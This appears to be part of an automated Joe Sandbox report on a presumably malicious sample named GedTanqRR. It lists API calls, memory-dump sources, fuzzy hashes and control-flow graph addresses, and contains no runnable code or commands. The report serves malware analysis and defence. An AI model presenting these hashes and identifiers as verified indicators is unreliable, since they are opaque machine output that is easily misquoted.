                                                                                                                    • Source File: 00000009.00000002.1860046935.000000000B5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B5E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_b5e0000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ResumeThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 947044025-0
                                                                                                                    • Opcode ID: 7a2964b95597ac76c3bf32cb50df8f5d186bcb9be6fd4325adf0b2f1540d4226
                                                                                                                    • Instruction ID: 25114d90b79d1d883f17f91e12336cd8876b81d12f296f6a9c19973c374f9b57
                                                                                                                    • Opcode Fuzzy Hash: 7a2964b95597ac76c3bf32cb50df8f5d186bcb9be6fd4325adf0b2f1540d4226
                                                                                                                    • Instruction Fuzzy Hash: D6113AB19003498FDB14DFAAC4497DFFBF5EB88324F20845DD519A7240CB75A944CBA4
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0180AFBE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1851309213.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_1800000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: c43fdc9cb8d4adee13bc8b9da4da9c17cedad6be8748ad61cede84a88c04a2fc
                                                                                                                    • Instruction ID: 7ff4b2b5fbc18ecd286ecce99bda7459c98c716e66f36523078075bd21240ae4
                                                                                                                    • Opcode Fuzzy Hash: c43fdc9cb8d4adee13bc8b9da4da9c17cedad6be8748ad61cede84a88c04a2fc
                                                                                                                    • Instruction Fuzzy Hash: CE1110B5C003498FDB14CF9AC844ADEFBF4EB88324F10841AD929A7640C379A645CFA1
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 076B1505
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1857914391.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_76b0000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: 6472e1faf75be79bf7b5def38555903a31142ddba4acbe57daf3cfc928c6d12c
                                                                                                                    • Instruction ID: 6c4ee729a620703e963caac5f525fdcf5346643cc9dc6c182a022823931328d1
                                                                                                                    • Opcode Fuzzy Hash: 6472e1faf75be79bf7b5def38555903a31142ddba4acbe57daf3cfc928c6d12c
                                                                                                                    • Instruction Fuzzy Hash: CB1115B58003499FDB10DF9AC889BDEFBF8EB49324F10881AE559A7700C375A584CFA1
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 076B1505
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1857914391.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_76b0000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: 057fd59092e045159bf4b791d5dda6ae1cf8096605b5107dc169b0e8b9bda877
                                                                                                                    • Instruction ID: 52328f340eea373e551211c523231032848a0c567708ff82f6a8454518979965
                                                                                                                    • Opcode Fuzzy Hash: 057fd59092e045159bf4b791d5dda6ae1cf8096605b5107dc169b0e8b9bda877
                                                                                                                    • Instruction Fuzzy Hash: 3D11E5B58003499FDB10DF9AC889BDEFBF8EB49324F10841AD559A7640C375A584CFA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1849765445.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_142d000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f37a6c69b976eebf8acb212a71d973a1922dd322e20cbda24b1979dd8459e14f
                                                                                                                    • Instruction ID: 8827de365e60d04be3cc0741885ffc962865c659f04c58243f01c97f0440a64d
                                                                                                                    • Opcode Fuzzy Hash: f37a6c69b976eebf8acb212a71d973a1922dd322e20cbda24b1979dd8459e14f
                                                                                                                    • Instruction Fuzzy Hash: 092136B1904200DFDB05DF48C9C4B56BF65FB94324F60C57AD90A0B366C336E496CBA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1849870069.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_143d000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 287548341fb2d0a919c8422ead4605d7bbceb2e09ceb344defa18b4e7e9d45b9
                                                                                                                    • Instruction ID: 63a9b063b276e56b925394af2594b05c4b250c01b35d72165029b369e78460ad
                                                                                                                    • Opcode Fuzzy Hash: 287548341fb2d0a919c8422ead4605d7bbceb2e09ceb344defa18b4e7e9d45b9
                                                                                                                    • Instruction Fuzzy Hash: 7A210A71904200DFDB05DF54D9C4B16BBA5FBC8324F64C56ED9094B362C736D416CB61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1849870069.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_143d000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3eacb06ed20200fe11e6a5036c287152eed0fb825e473a374faabe8132560f6d
                                                                                                                    • Instruction ID: dd57cfdbc490942f5bc1e628c2a7a336691794b68b60c49916c0003294f78112
                                                                                                                    • Opcode Fuzzy Hash: 3eacb06ed20200fe11e6a5036c287152eed0fb825e473a374faabe8132560f6d
                                                                                                                    • Instruction Fuzzy Hash: 7F21F1B1A042009FDB15DF58D884B16FBB5EB88718F60C56AD90A0B3A6C336D407CA61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1849870069.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_143d000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fb13c3e52122447216d17a5147202bfa0ba127562a85c2b19dc5eed169fb57cb
                                                                                                                    • Instruction ID: 51a6de0c833c565cc67a5c8dcc6c7528feb13fc1d4ef23bce4dd1e19fb1adcd0
                                                                                                                    • Opcode Fuzzy Hash: fb13c3e52122447216d17a5147202bfa0ba127562a85c2b19dc5eed169fb57cb
                                                                                                                    • Instruction Fuzzy Hash: 8B2180755093808FDB03CF64D594716BF71EB86214F28C5DBD8498F2A7C33A980ACB62
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1849765445.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_142d000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                    • Instruction ID: f1e092b82b2247e3761de23ef5ed0b791ea00c2e3b2ee964aae4a29b2d48f42b
                                                                                                                    • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                    • Instruction Fuzzy Hash: BF11D276904240CFDB02CF44D9C4B56BF71FB84324F24C2AAD9090B266C33AD456CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.1849870069.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_143d000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                    • Instruction ID: eb0203c7a4ea612dd80afdde67fb160c9741bfcd906e3906cf56276348a01c36
                                                                                                                    • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                    • Instruction Fuzzy Hash: 8711BB75904280DFDB02CF54C5C4B16BBB2FB88224F24C6AED8494B3A6C33AD40ACB61

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:11.3%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:20
                                                                                                                    Total number of Limit Nodes:4
                                                                                                                    execution_graph 23461 2c38040 23462 2c38086 DeleteFileW 23461->23462 23464 2c380bf 23462->23464 23465 2c30848 23467 2c3084e 23465->23467 23466 2c3091b 23467->23466 23469 2c31340 23467->23469 23471 2c31343 23469->23471 23470 2c31454 23470->23467 23471->23470 23473 2c38219 23471->23473 23474 2c38223 23473->23474 23475 2c382d9 23474->23475 23478 6a4fa80 23474->23478 23482 6a4fa70 23474->23482 23475->23471 23479 6a4fa95 23478->23479 23480 6a4fca6 23479->23480 23481 6a4fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx 23479->23481 23480->23475 23481->23479 23483 6a4fa95 23482->23483 23484 6a4fca6 23483->23484 23485 6a4fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx 23483->23485 23484->23475 23485->23483

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 125 6a43578-6a43599 126 6a4359b-6a4359e 125->126 127 6a435a4-6a435c3 126->127 128 6a43d3f-6a43d42 126->128 138 6a435c5-6a435c8 127->138 139 6a435dc-6a435e6 127->139 129 6a43d44-6a43d63 128->129 130 6a43d68-6a43d6a 128->130 129->130 131 6a43d71-6a43d74 130->131 132 6a43d6c 130->132 131->126 135 6a43d7a-6a43d83 131->135 132->131 138->139 140 6a435ca-6a435da 138->140 142 6a435ec-6a435fd call 6a42370 139->142 140->142 145 6a43602-6a43607 142->145 146 6a43614-6a438f1 145->146 147 6a43609-6a4360f 145->147 168 6a438f7-6a439a6 146->168 169 6a43d31-6a43d3e 146->169 147->135 178 6a439cf 168->178 179 6a439a8-6a439cd 168->179 181 6a439d8-6a439eb call 6a4237c 178->181 179->181 184 6a439f1-6a43a13 call 6a42388 181->184 185 6a43d18-6a43d24 181->185 184->185 189 6a43a19-6a43a23 184->189 185->168 187 6a43d2a 185->187 187->169 189->185 190 6a43a29-6a43a34 189->190 190->185 191 6a43a3a-6a43b10 190->191 203 6a43b12-6a43b14 191->203 204 6a43b1e-6a43b4e 191->204 203->204 208 6a43b50-6a43b52 204->208 209 6a43b5c-6a43b68 204->209 208->209 210 6a43bc8-6a43bcc 209->210 211 6a43b6a-6a43b6e 209->211 212 6a43bd2-6a43c0e 210->212 213 6a43d09-6a43d12 210->213 211->210 214 6a43b70-6a43b9a 211->214 226 6a43c10-6a43c12 212->226 227 6a43c1c-6a43c2a 212->227 213->185 213->191 221 6a43b9c-6a43b9e 214->221 222 6a43ba8-6a43bc5 call 6a42394 214->222 221->222 222->210 226->227 229 6a43c41-6a43c4c 227->229 230 6a43c2c-6a43c37 227->230 234 6a43c64-6a43c75 229->234 235 6a43c4e-6a43c54 229->235 230->229 233 6a43c39 230->233 233->229 239 6a43c77-6a43c7d 234->239 240 6a43c8d-6a43c99 234->240 236 6a43c56 235->236 237 6a43c58-6a43c5a 235->237 236->234 237->234 241 6a43c81-6a43c83 239->241 242 6a43c7f 239->242 244 6a43cb1-6a43d02 240->244 245 6a43c9b-6a43ca1 240->245 241->240 242->240 244->213 246 6a43ca5-6a43ca7 245->246 247 6a43ca3 245->247 246->244 247->244
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2392861976
                                                                                                                    • Opcode ID: 6af58647da47af5fbc32c2de8a19e61aec331108527b07cd2fd1b1bf2cd3315a
                                                                                                                    • Instruction ID: c3f6851cbcd7f1c3ceacb714d4fe5fb76840aae04935f08b7834f52cbd65c365
                                                                                                                    • Opcode Fuzzy Hash: 6af58647da47af5fbc32c2de8a19e61aec331108527b07cd2fd1b1bf2cd3315a
                                                                                                                    • Instruction Fuzzy Hash: F8322031E1071A8FCB54EF75C89459DB7B6FFC9300F61CAA9D409AB254EB30A985CB81

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 629 6a47e90-6a47eae 630 6a47eb0-6a47eb3 629->630 631 6a47ed4-6a47ed7 630->631 632 6a47eb5-6a47ecf 630->632 633 6a47eee-6a47ef1 631->633 634 6a47ed9-6a47ee7 631->634 632->631 636 6a47f14-6a47f17 633->636 637 6a47ef3-6a47f0f 633->637 645 6a47f36-6a47f4c 634->645 646 6a47ee9 634->646 638 6a47f24-6a47f26 636->638 639 6a47f19-6a47f23 636->639 637->636 642 6a47f2d-6a47f30 638->642 643 6a47f28 638->643 642->630 642->645 643->642 649 6a48167-6a48171 645->649 650 6a47f52-6a47f5b 645->650 646->633 651 6a47f61-6a47f7e 650->651 652 6a48172-6a481a7 650->652 661 6a48154-6a48161 651->661 662 6a47f84-6a47fac 651->662 655 6a481a9-6a481ac 652->655 656 6a483e1-6a483e4 655->656 657 6a481b2-6a481c1 655->657 659 6a483e6-6a48402 656->659 660 6a48407-6a4840a 656->660 666 6a481e0-6a48224 657->666 667 6a481c3-6a481de 657->667 659->660 664 6a484b5-6a484b7 660->664 665 6a48410-6a4841c 660->665 661->649 661->650 662->661 680 6a47fb2-6a47fbb 662->680 669 6a484be-6a484c1 664->669 670 6a484b9 664->670 672 6a48427-6a48429 665->672 685 6a483b5-6a483cb 666->685 686 6a4822a-6a4823b 666->686 667->666 669->655 673 6a484c7-6a484d0 669->673 670->669 675 6a48441-6a48445 672->675 676 6a4842b-6a48431 672->676 683 6a48447-6a48451 675->683 684 6a48453 675->684 681 6a48435-6a48437 676->681 682 6a48433 676->682 680->652 689 6a47fc1-6a47fdd 680->689 681->675 682->675 687 6a48458-6a4845a 683->687 684->687 685->656 696 6a483a0-6a483af 686->696 697 6a48241-6a4825e 686->697 691 6a4845c-6a4845f 687->691 692 6a4846b-6a484a4 687->692 699 6a48142-6a4814e 689->699 700 6a47fe3-6a4800d 689->700 691->673 692->657 712 6a484aa-6a484b4 692->712 696->685 696->686 697->696 706 6a48264-6a4835a call 6a466b0 697->706 699->661 699->680 713 6a48013-6a4803b 700->713 714 6a48138-6a4813d 700->714 762 6a4835c-6a48366 706->762 763 6a48368 706->763 713->714 720 6a48041-6a4806f 713->720 714->699 720->714 726 6a48075-6a4807e 720->726 726->714 728 6a48084-6a480b6 726->728 735 6a480c1-6a480dd 728->735 736 6a480b8-6a480bc 728->736 735->699 738 6a480df-6a48136 call 6a466b0 735->738 736->714 737 6a480be 736->737 737->735 738->699 764 6a4836d-6a4836f 762->764 763->764 764->696 765 6a48371-6a48376 764->765 766 6a48384 765->766 767 6a48378-6a48382 765->767 768 6a48389-6a4838b 766->768 767->768 768->696 769 6a4838d-6a48399 768->769 769->696
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q
                                                                                                                    • API String ID: 0-355816377
                                                                                                                    • Opcode ID: 696da4222465269270144771d64c5d02312c1552e3a46e90d5ddb97238b6ba5e
                                                                                                                    • Instruction ID: 8a16f65d71c11fe9d8de3ccf8471243f6b58e62323f27d567c25b746f7dba044
                                                                                                                    • Opcode Fuzzy Hash: 696da4222465269270144771d64c5d02312c1552e3a46e90d5ddb97238b6ba5e
                                                                                                                    • Instruction Fuzzy Hash: 37026B31B102158FDB58EB68E89066EB7E6FFC4304F148969D419DB384DB35EC82CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1498 6a456a8-6a456c5 1499 6a456c7-6a456ca 1498->1499 1500 6a45702-6a45705 1499->1500 1501 6a456cc-6a456d2 1499->1501 1502 6a45707-6a45709 1500->1502 1503 6a4570c-6a4570f 1500->1503 1504 6a456d8-6a456e0 1501->1504 1505 6a4588b-6a458bb 1501->1505 1502->1503 1506 6a45711-6a4571e 1503->1506 1507 6a45723-6a45726 1503->1507 1504->1505 1508 6a456e6-6a456f3 1504->1508 1520 6a458c5-6a458c8 1505->1520 1506->1507 1509 6a45728-6a4572e 1507->1509 1510 6a45739-6a4573c 1507->1510 1508->1505 1512 6a456f9-6a456fd 1508->1512 1514 6a45734 1509->1514 1515 6a45825-6a4582f 1509->1515 1516 6a4573e-6a45745 1510->1516 1517 6a4574a-6a4574d 1510->1517 1512->1500 1514->1510 1521 6a45836-6a45838 1515->1521 1516->1517 1518 6a45760-6a45763 1517->1518 1519 6a4574f-6a45755 1517->1519 1526 6a45765-6a4576e 1518->1526 1527 6a4576f-6a45772 1518->1527 1522 6a45818-6a4581b 1519->1522 1523 6a4575b 1519->1523 1524 6a458ea-6a458ed 1520->1524 1525 6a458ca-6a458ce 1520->1525 1533 6a4583d-6a45840 1521->1533 1532 6a45820-6a45823 1522->1532 1523->1518 1528 6a45901-6a45904 1524->1528 1529 6a458ef-6a458f6 1524->1529 1534 6a458d4-6a458dc 1525->1534 1535 6a459ba-6a459c8 1525->1535 1530 6a45774-6a4577a 1527->1530 1531 6a45785-6a45788 1527->1531 1539 6a45926-6a45929 1528->1539 1540 6a45906-6a4590a 1528->1540 1536 6a459b2-6a459b9 1529->1536 1537 6a458fc 1529->1537 1530->1501 1538 6a45780 1530->1538 1541 6a45790-6a45793 1531->1541 1542 6a4578a-6a4578b 1531->1542 1532->1515 1532->1533 1543 6a45842-6a45854 1533->1543 1544 6a45859-6a4585c 1533->1544 1534->1535 1545 6a458e2-6a458e5 1534->1545 1553 6a459f8-6a459f9 1535->1553 1554 6a459ca-6a459f4 1535->1554 1537->1528 1538->1531 1550 6a45947-6a4594a 1539->1550 1551 6a4592b-6a4592f 1539->1551 1540->1535 1547 6a45910-6a45918 1540->1547 1548 6a457a4-6a457a7 1541->1548 1549 6a45795-6a45799 1541->1549 1542->1541 1543->1544 1544->1509 1546 6a45862-6a45865 1544->1546 1545->1524 1546->1530 1556 6a4586b-6a4586d 1546->1556 1547->1535 1557 6a4591e-6a45921 1547->1557 1560 6a457b1-6a457b4 1548->1560 1561 6a457a9-6a457ac 1548->1561 1558 6a4587d-6a4588a 1549->1558 1559 6a4579f 1549->1559 1563 6a45962-6a45965 1550->1563 1564 6a4594c-6a4595d 1550->1564 1551->1535 1562 6a45935-6a4593d 1551->1562 1568 6a45a07-6a45a0a 1553->1568 1569 6a459fb-6a45a02 1553->1569 1567 6a459f6 1554->1567 1570 6a45874-6a45877 1556->1570 1571 6a4586f 1556->1571 1557->1539 1559->1548 1573 6a457b6-6a457d5 1560->1573 1574 6a457da-6a457dd 1560->1574 1561->1560 1562->1535 1572 6a4593f-6a45942 1562->1572 1565 6a45967-6a4596e 1563->1565 1566 6a4596f-6a45972 1563->1566 1564->1563 1577 6a45974-6a45978 1566->1577 1578 6a4598c-6a4598f 1566->1578 1567->1553 1579 6a45a10-6a45ba4 1568->1579 1580 6a45cf3-6a45cf6 1568->1580 1569->1568 1570->1499 1570->1558 1571->1570 1572->1550 1573->1574 1575 6a457f3-6a457f6 1574->1575 1576 6a457df-6a457ee 1574->1576 1585 6a45813-6a45816 1575->1585 1586 6a457f8-6a4580e 1575->1586 1576->1575 1577->1535 1584 6a4597a-6a45982 1577->1584 1587 6a459a0-6a459a2 1578->1587 1588 6a45991-6a4599b 1578->1588 1649 6a45cdd-6a45cf0 1579->1649 1650 6a45baa-6a45bb1 1579->1650 1582 6a45d0e-6a45d11 1580->1582 1583 6a45cf8-6a45d0b 1580->1583 1592 6a45d13-6a45d24 1582->1592 1593 6a45d2b-6a45d2e 1582->1593 1584->1535 1591 6a45984-6a45987 1584->1591 1585->1522 1585->1532 1586->1585 1595 6a459a4 1587->1595 1596 6a459a9-6a459ac 1587->1596 1588->1587 1591->1578 1608 6a45d26 1592->1608 1609 6a45d73-6a45d7a 1592->1609 1600 6a45d30-6a45d41 1593->1600 1601 6a45d48-6a45d4b 1593->1601 1595->1596 1596->1520 1596->1536 1606 6a45d56-6a45d67 1600->1606 1613 6a45d43 1600->1613 1601->1579 1603 6a45d51-6a45d54 1601->1603 1603->1606 1607 6a45d6e-6a45d71 1603->1607 1606->1609 1616 6a45d69 1606->1616 1607->1609 1611 6a45d7f-6a45d82 1607->1611 1608->1593 1609->1611 1611->1579 1615 6a45d88-6a45d8b 1611->1615 1613->1601 1617 6a45d8d-6a45d9e 1615->1617 1618 6a45da9-6a45dac 1615->1618 1616->1607 1617->1583 1629 6a45da4 1617->1629 1620 6a45dc6-6a45dc9 1618->1620 1621 6a45dae-6a45dbf 1618->1621 1622 6a45dd3-6a45dd5 1620->1622 1623 6a45dcb-6a45dd0 1620->1623 1621->1609 1630 6a45dc1 1621->1630 1627 6a45dd7 1622->1627 1628 6a45ddc-6a45ddf 1622->1628 1623->1622 1627->1628 1628->1567 1632 6a45de5-6a45dee 1628->1632 1629->1618 1630->1620 1651 6a45c65-6a45c6c 1650->1651 1652 6a45bb7-6a45bda 1650->1652 1651->1649 1654 6a45c6e-6a45ca1 1651->1654 1661 6a45be2-6a45bea 1652->1661 1665 6a45ca6-6a45cd3 1654->1665 1666 6a45ca3 1654->1666 1663 6a45bec 1661->1663 1664 6a45bef-6a45c30 1661->1664 1663->1664 1674 6a45c32-6a45c43 1664->1674 1675 6a45c48-6a45c59 1664->1675 1665->1632 1666->1665 1674->1632 1675->1632
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 0-3993045852
                                                                                                                    • Opcode ID: 8f39fc0134e9da4f699de8d104b7a8f5bd02d199fc446c0a661ead6d6f6133a6
                                                                                                                    • Instruction ID: 333f471b69bdaec73c7cef4d0d90350affdf1568dff5999ec1ac9c61d9b89e9a
                                                                                                                    • Opcode Fuzzy Hash: 8f39fc0134e9da4f699de8d104b7a8f5bd02d199fc446c0a661ead6d6f6133a6
                                                                                                                    • Instruction Fuzzy Hash: 3622BE71E002198FDF64EBA4C8846AEBBF2FF85324F208469D459AF345DA35DC46CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2e1f321d7e39b7113c884abfafb4fb8b9782a28c382d3b1247d09ad3df99d7d4
                                                                                                                    • Instruction ID: b4dc7a0fa855f0d747a9e5ddf0860889dfd9ffe376e4f89633eea02cdde03c79
                                                                                                                    • Opcode Fuzzy Hash: 2e1f321d7e39b7113c884abfafb4fb8b9782a28c382d3b1247d09ad3df99d7d4
                                                                                                                    • Instruction Fuzzy Hash: 8FA20334A002088FDB64EB68C984B9DBBF2FB89314F5584A9E4499F361DB35ED85CF41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.3020303162.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_6a40000_GedTanqRR.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4cfe7c163b8bb119766d0489ce1d40a8fa5362b91d4749e0d37cdc9e323489a5
                                                                                                                    • Instruction ID: 9bda34ddae76ed93dbcaf1e0ff4e8728700475b1d5bec88fdd57dfbd2739672f
                                                                                                                    • Opcode Fuzzy Hash: 4cfe7c163b8bb119766d0489ce1d40a8fa5362b91d4749e0d37cdc9e323489a5
                                                                                                                    • Instruction Fuzzy Hash: CC628C35A102158FDB54FB68D990AAEB7F2EFC9314F248469E40ADB354DB35EC42CB90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 6a4ade0-6a4adfe 1 6a4ae00-6a4ae03 0->1 2 6a4ae05-6a4ae21 1->2 3 6a4ae26-6a4ae29 1->3 2->3 4 6a4affd-6a4b006 3->4 5 6a4ae2f-6a4ae32 3->5 7 6a4b00c-6a4b016 4->7 8 6a4ae89-6a4ae92 4->8 9 6a4ae34-6a4ae41 5->9 10 6a4ae46-6a4ae49 5->10 13 6a4b017-6a4b04e 8->13 14 6a4ae98-6a4ae9c 8->14 9->10 11 6a4ae5a-6a4ae5d 10->11 12 6a4ae4b-6a4ae4f 10->12 17 6a4ae67-6a4ae6a 11->17 18 6a4ae5f-6a4ae64 11->18 12->7 16 6a4ae55 12->16 28 6a4b050-6a4b053 13->28 20 6a4aea1-6a4aea4 14->20 16->11 21 6a4ae84-6a4ae87 17->21 22 6a4ae6c-6a4ae7f 17->22 18->17 24 6a4aeb4-6a4aeb6 20->24 25 6a4aea6-6a4aeaf 20->25 21->8 21->20 22->21 26 6a4aebd-6a4aec0 24->26 27 6a4aeb8 24->27 25->24 26->1 29 6a4aec6-6a4aeea 26->29 27->26 31 6a4b055-6a4b071 28->31 32 6a4b076-6a4b079 28->32 49 6a4aef0-6a4aeff 29->49 50 6a4affa 29->50 31->32 33 6a4b088-6a4b08b 32->33 34 6a4b07b call 6a4b3df 32->34 37 6a4b08d-6a4b091 33->37 38 6a4b098-6a4b09b 33->38 39 6a4b081-6a4b083 34->39 40 6a4b0a1-6a4b0dc 37->40 41 6a4b093 37->41 38->40 42 6a4b304-6a4b307 38->42 39->33 53 6a4b0e2-6a4b0ee 40->53 54 6a4b2cf-6a4b2e2 40->54 41->38 43 6a4b314-6a4b316 42->43 44 6a4b309-6a4b313 42->44 47 6a4b31d-6a4b320 43->47 48 6a4b318 43->48 47->28 52 6a4b326-6a4b330 47->52 48->47 58 6a4af17-6a4af52 call 6a466b0 49->58 59 6a4af01-6a4af07 49->59 50->4 61 6a4b0f0-6a4b109 53->61 62 6a4b10e-6a4b152 53->62 56 6a4b2e4 54->56 60 6a4b2e5 56->60 75 6a4af54-6a4af5a 58->75 76 6a4af6a-6a4af81 58->76 63 6a4af09 59->63 64 6a4af0b-6a4af0d 59->64 60->60 61->56 80 6a4b154-6a4b166 62->80 81 6a4b16e-6a4b1ad 62->81 63->58 64->58 78 6a4af5c 75->78 79 6a4af5e-6a4af60 75->79 89 6a4af83-6a4af89 76->89 90 6a4af99-6a4afaa 76->90 78->76 79->76 80->81 86 6a4b294-6a4b2a9 81->86 87 6a4b1b3-6a4b28e call 6a466b0 81->87 86->54 87->86 92 6a4af8d-6a4af8f 89->92 93 6a4af8b 89->93 97 6a4afc2-6a4aff3 90->97 98 6a4afac-6a4afb2 90->98 92->90 93->90 97->50 100 6a4afb4 98->100 101 6a4afb6-6a4afb8 98->101 100->97 101->97
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
